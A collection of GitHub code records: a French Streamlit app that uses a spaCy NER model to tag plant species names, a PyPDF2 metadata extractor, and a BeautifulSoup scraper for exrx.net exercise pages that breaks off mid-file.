{"seq_id":"35777654760","text":"import streamlit as st\nimport spacy\nfrom spacy import displacy\nimport pandas as pd\nimport csv \nimport re\n\ndef app():\n\n    html_temp = \"\"\"\n    \n    \n    \n    \"\"\"\n\n    st.markdown(\"\"\"\n    ## Un modèle NER pour l'extraction des espèces de plantes\n    \"\"\")\n    st.markdown(html_temp.format(\"rgba(55, 53, 47, 0.16)\"),unsafe_allow_html=True)\n    st.markdown(\"\"\"\n    Dans la botanique, chaque espèce est dotée d'un nom binomial qui se compose du nom scientifique du genre et d'une épithète spécifique qui décrit l'espèce. \n    Ce modèle permet d'extraire les noms d'espèces botaniques à partir de description textuelle.\n    \"\"\")\n    # st.warning(\"Dans la botanique, chaque espèce est dotée d'un nom binomial qui se compose du nom scientifique du genre et d'une épithète spécifique qui décrit l'espèce. Ce modèle permet d'extraire les noms d'espèces botaniques à partir de description textuelle.\")\n    st.markdown(html_temp.format(\"rgba(55, 53, 47, 0.16)\"),unsafe_allow_html=True)\n    \n    with st.sidebar:\n        # model versions in sidebar\n        choices = {\n            'Modèle v2 (2425 data rows)': './ner-models/ner-species-model-close-recent',\n            'Modèle v1 (1449 data rows)': './ner-models/ner-species-model-recent'\n        }\n        model_choice = st.selectbox('Version du modèle NER', choices.keys())\n\n    \n    # loading model\n    nlp = spacy.load(choices[model_choice])\n    # default input text\n    example_text = \"Oxera subverticillata est une liane robuste de forêt dense humide, largement répartie du centre au nord de la Grande Terre. Espèce assez commune avec une zone d'occurrence (EOO) de 3651 km² et une zone d'occupation de 100 km², O. subverticillata est évalué en Préoccupation Mineure (LC).\"\n    # input field\n    text = st.text_area(\"Entrer du texte ici\",example_text)\n    # html wrapper to visualize output\n    HTML_WRAPPER = \"\"\"{}\"\"\"\n    if text:\n        # feed input text to model\n        doc = nlp(text)\n        # use displacy to visualize the output\n        html = displacy.render(doc,style=\"ent\")\n        html = html.replace(\"\\n\\n\",\"\\n\")\n        with st.expander(\"Affichage NER\"):\n            st.write(HTML_WRAPPER.format(html),unsafe_allow_html=True)\n\n    with st.expander(\"Etendre l'ensemble de données\"):\n        st.markdown(\"\"\"\n        ### Améliorer le modèle: Etendre l'ensemble de données\n        \"\"\")\n        st.warning(\"Pour étendre l'ensemble de données d'entraînement, l'utilisateur peut enregistrer le texte d'entrée avec ses entités nommées, présentes et manquantes, de type ESPECE.\")\n\n        # extracted named entities\n        present_named_entities = [e.text for e in doc.ents]\n\n        # str_present_named_entities = ', '.join(present_named_entities)\n        # named_entities = st.text_input('Ajouter les entités nommées manquantes en les séparant par une virgule', str_present_named_entities)\n        \n        # extract potential named entities with regex\n        r = '([A-Z][a-z]+[ ][a-z]{3,}|[A-Z][.][ ][a-z]{3,})'\n        match = re.findall(r, text)\n        named_entities = st.multiselect('Ajouter les entités nommées manquantes', match, present_named_entities)\n        named_entities = ', '.join(named_entities)\n        # data row to add\n        fields = [text, named_entities]\n        # read local csv file\n        r = pd.read_csv('./data/data.csv')\n        if st.button('Ajouter comme ligne de données'):\n            with open('./data/data.csv', 'a', encoding='utf-8', newline='') as f:\n                # write to csv file (append mode)\n                writer = csv.writer(f, delimiter=',', lineterminator='\\n')\n                writer.writerow(fields)\n            # display data\n            r = pd.read_csv('./data/data.csv')\n            st.table(r)\n\n","repo_name":"nainiayoub/plant-species-ner","sub_path":"pages/especes.py","file_name":"especes.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"32297209168","text":"\n\nfrom PyPDF2 import PdfReader\n\ndef extract_information(pdf_path):\n    with open(pdf_path, 'rb') as f:\n        pdf = PdfReader(f)\n        information = pdf.metadata\n        number_of_pages = len(pdf.pages)\n\n    return {\n        'Author': information.author,\n        'Creator': information.creator,\n        'Producer': information.producer,\n        'Subject': information.subject,\n        'Title': information.title,\n        'Number of pages': number_of_pages\n    }","repo_name":"Sawe22/pdfMetaDataExtractor","sub_path":"pdf_metadata_extractor.py","file_name":"pdf_metadata_extractor.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
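# Usage sketch for extract_information above; the file name is a hypothetical
# placeholder, and the .metadata/.pages attributes of PdfReader are the
# PyPDF2 3.x API already used inside the function:
if __name__ == '__main__':
    info = extract_information('example.pdf')  # hypothetical input file
    for key, value in info.items():
        print(f'{key}: {value}')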
{"seq_id":"38084660629","text":"import requests\nimport re\nimport sys \nimport os\nimport csv\nfrom json import dumps\nfrom bs4 import BeautifulSoup\n\nmyfile = open('sortedLinks.txt', 'r')\nLinks=myfile.readline().split(\",\")\nDataList=[]\nOtherLinks=[]\ni=0\n# url = \"https://exrx.net/WeightExercises/Sternocleidomastoid/CBNeckFlxBelt\"\n# url1=\"https://exrx.net/Stretches/ChestGeneral/BehindHead\"\n# url2='https://exrx.net/WeightExercises/Supinators/LVSeatedSupination'\n# url3='https://exrx.net/WeightExercises/ErectorSpinae/BBStraightLegDeadlift'\n# url4='https://exrx.net/Stretches/ErectorSpinae/Cat'\n\n\nfor data in Links:\n    List1=[]\n    i=i+1\n    if(i>=1501):\n        data1=data.replace(\"'\", \"\")\n        r = requests.get(data1)\n        soup = BeautifulSoup(r.content, 'html.parser')\n        mainHeading=soup.find('h1',class_='page-title')\n        try:\n            subHeading=mainHeading.find_next('h2')\n            if(subHeading==None):\n                continue\n            elif(subHeading.get_text()==\"Classification\"):\n                List1.append(data1)\n                List1.append(\"Exercise Name:\")\n                List1.append(mainHeading.get_text())\n                List1.append(subHeading.get_text())\n                tableHeading1=subHeading.find_next('strong')\n                List1.append(tableHeading1.get_text())\n                \n                # print(mydata)\n                tableData1=tableHeading1.find_next('td')\n                tableDataLink1=tableData1.find_all('a')\n                if(len(tableDataLink1)==3):\n                    List1.append(tableDataLink1[0].get_text())\n                    tableHeading2=tableHeading1.find_next('strong')\n                    List1.append(tableHeading2.get_text())\n                    List1.append(tableDataLink1[1].get_text())\n                    tableHeading3=tableHeading2.find_next('strong')\n                    List1.append(tableHeading3.get_text())\n                    List1.append(tableDataLink1[2].get_text())\n                elif(len(tableDataLink1)==4):\n                    data1=tableDataLink1[0].get_text()+\" or \"+tableDataLink1[1].get_text()\n                    List1.append(data1)\n                    tableHeading2=tableHeading1.find_next('strong')\n                    List1.append(tableHeading2.get_text())\n                    List1.append(tableDataLink1[2].get_text())\n                    tableHeading3=tableHeading2.find_next('strong')\n                    List1.append(tableHeading3.get_text())\n                    List1.append(tableDataLink1[3].get_text())\n                else:\n                    tableData1=tableHeading1.find_next('td')\n                    mydata=str(tableHeading1.find_next('td'))\n                    mydata=re.split('&#13;\n&#13;\n|||&#13;\n&#13;\n|&#13;\n&#13;\n|&#13;\n&#13;\n||||||',mydata)\n                    for datainloop in mydata:\n                        if(datainloop==''):\n                            continue\n                        elif(datainloop[:7]==' width='):\n                            continue\n                        elif(datainloop[:8]==' height='):\n                            continue\n                        elif(datainloop[:6]==\" href=\"):\n                            continue\n                        else:\n                            List1.append(datainloop)\n                subHeading=tableData1.find_next('h2')\n                List1.append(subHeading.get_text())\n                Heading1=subHeading.find_next('strong')\n                List1.append(Heading1.get_text())\n                paragraph1=str(Heading1.find_next('p'))\n                paragraph1=re.split('&#13;\n&#13;\n|||&#13;\n&#13;\n|&#13;\n&#13;\n|&#13;\n&#13;\n||',paragraph1)\n                ListData1=\"\"\n                for check in paragraph1:\n                    if(check=='Execution'):\n                        break\n                    elif(check[:6]==\" href=\"):\n                        continue\n                    else:\n                        ListData1=ListData1+check\n                \n                List1.append(\" \".join(ListData1.split( )))\n                Heading2=Heading1.find_next('strong')\n                List1.append(Heading2.get_text())\n                paragraph2=str(Heading2.find_next('p'))\n                paragraph2=re.split('&#13;\n&#13;\n|||&#13;\n&#13;\n|&#13;\n&#13;\n|&#13;\n&#13;\n||',paragraph2)\n                ListData2=\"\"\n                for check1 in paragraph2:\n                    if(check1=='Comments'):\n                        break\n                    elif(check1[:6]==\" href=\"):\n                        continue\n                    else:\n                        ListData2=ListData2+check1\n                \n                List1.append(\" \".join(ListData2.split( )))\n                subHeading1=subHeading.find_next('h2')\n                List1.append(subHeading1.get_text())\n                paragraph3=str(subHeading1.find_next('p'))\n                paragraphstring=subHeading1.find_next('p')\n                paragraph4=str(paragraphstring.find_next('div'))\n                # print(paragraph4)\n                paragraph5=paragraph3+paragraph4\n                paragraph5=re.split('&#13;\n&#13;\n|||&#13;\n&#13;\n|&#13;\n&#13;\n|&#13;\n&#13;\n|||&#13;\n    |&#13;\n  • |&#13;\n||',paragraph5)\n                ListData3=\"\"\n                for check2 in paragraph5:\n                    if(check2=='Muscles'):\n                        break\n                    elif(check2=='Force (Articulation)'):\n                        OtherLinks.append(data1)\n                        break\n                    elif(check2[:6]==\" href=\"):\n                        continue\n                    elif(check2[:5]==\" data\"):\n                        continue\n                    # elif(check2[:7]==\" class=\"):\n                    # continue\n                    else:\n                        ListData3=ListData3+\" \"+check2\n                List1.append(\" \".join(ListData3.split( )))\n                try:\n                    subHeading2=subHeading1.find_next('h2')\n                    List1.append(subHeading2.get_text())\n                    Heading3=subHeading2.find_next('strong')\n                    List1.append(Heading3.get_text())\n                    ListItem1=Heading3.find_next('ul')\n                    ListItemString=str(Heading3.find_next('ul'))\n                    ListItemString=re.split('&#13;\n&#13;\n|&#13;\n&#13;\n|&#13;